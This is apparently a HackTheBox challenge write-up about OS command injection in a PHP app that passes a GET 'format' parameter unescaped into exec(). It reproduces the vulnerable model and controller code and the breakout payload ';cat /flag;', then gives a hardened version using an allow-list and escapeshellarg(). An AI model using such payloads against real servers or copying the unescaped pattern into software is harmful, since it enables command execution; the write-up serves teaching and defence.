hackthebox
Task: PHP web app with date command. Solution: OS command injection via single quote escape in exec() call, breaking out of quoted shell argument to read /flag.
"Are you ready to unravel the mysteries and expose the truth hidden within KROP's digital domain? Join the challenge and prove your prowess in the world of cybersecurity. Remember, time is money, but in this case, the rewards may be far greater than you imagine."
Target: http://154.57.164.74:30639
Downloaded and extracted the archive with the task source code. Structure — PHP MVC application:
| File | Purpose |
|---|---|
| TimeModel.php | Model: builds and executes the shell command `date` |
| TimeController.php | Controller: accepts the GET parameter `format` |
| index.php | Entry point |
| Router.php | Routing |
| Dockerfile | Shows the flag location: `/flag` |
`challenge/models/TimeModel.php` — the command is built via string concatenation:

```php
<?php
class TimeModel
{
    public function __construct($format)
    {
        // $format comes straight from the request and is concatenated into the
        // shell command string; the surrounding single quotes are not escaped.
        $this->command = "date '+" . $format . "' 2>&1";
    }

    public function getTime()
    {
        // exec() hands the whole string to /bin/sh, so any shell metacharacters
        // in $format are interpreted by the shell.
        $time = exec($this->command);
        $res = isset($time) ? $time : '?';
        return $res;
    }
}
```
`challenge/controllers/TimeController.php` — user input is passed through without filtering:

```php
<?php
class TimeController
{
    public function index($router)
    {
        // The raw GET parameter is used as-is; no validation or escaping.
        $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}
```
Data flow from request to shell:

```text
GET /?format=PAYLOAD
→ TimeController: $format = $_GET['format']            (no sanitization)
→ TimeModel:      "date '+" . $format . "' 2>&1"       (concatenation into the shell command)
→ exec($this->command)                                 (execution via the shell)
```
Problem: the GET parameter `format` is concatenated directly into the shell command string passed to `exec()`. The user input sits inside single quotes (`'`), but that only protects against input that contains no single quote, and nothing strips or escapes one. Closing the quote, appending a separator such as `;` and a command, then reopening the quote keeps the overall string syntactically valid for the shell, so the injected command runs alongside `date`.

Command template:

```text
date '+FORMAT' 2>&1
```

Payload:

```text
';cat /flag;'
```
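For contrast, here is a hardened version of the same model and controller. This is an added example, not code from the challenge: it keeps the page's class names and the `$router->view()` call, but the allow-list regex, the length limit and the `InvalidArgumentException` handling are my own choices. The fix is layered: reject anything that is not a `date(1)` directive or a plain separator before a shell is involved, and wrap the argument with `escapeshellarg()` so that even a stray quote cannot terminate the quoted argument.

```php
<?php
// Hardened TimeModel (added example; not the challenge's own code).
class TimeModel
{
    // Allow only date(1) conversion directives (%H, %M, %%, ...) and a small set
    // of literal separators. Quotes, semicolons, backticks, $() and newlines are
    // all rejected here, before any shell sees the value.
    private const FORMAT_RE = '/^(?:%[A-Za-z%]|[0-9A-Za-z:\/.,\- ])+$/';
    private const MAX_LEN   = 64;   // assumption: generous for a clock format

    private string $command;

    public function __construct(string $format)
    {
        if (strlen($format) > self::MAX_LEN || !preg_match(self::FORMAT_RE, $format)) {
            throw new InvalidArgumentException('unsupported date format');
        }
        // escapeshellarg() wraps the value in single quotes and escapes any
        // embedded single quote, so the argument boundary cannot be broken even
        // if the allow-list above were loosened later.
        $this->command = 'date ' . escapeshellarg('+' . $format) . ' 2>&1';
    }

    public function getTime(): string
    {
        $time = exec($this->command, $output, $status);
        return ($status === 0 && $time !== false) ? $time : '?';
    }
}

// Controller side: turn a rejected format into a 400 instead of a shell error.
class TimeController
{
    public function index($router)
    {
        $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
        try {
            $time = (new TimeModel($format))->getTime();
        } catch (InvalidArgumentException $e) {
            http_response_code(400);
            $time = '?';
        }
        return $router->view('index', ['time' => $time]);
    }
}
```

With this in place, `?format=%H:%M:%S` still works, while a value containing `'`, `;` or `$(` fails validation and never reaches `exec()`. A stricter option, on PHP 7.4 and later, is to avoid the shell entirely by calling `proc_open(['date', '+' . $format], ...)` with an array command, which passes the argument to `date` directly without any shell parsing; the allow-list is still worth keeping in that case so that the application only accepts formats it actually intends to render.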
...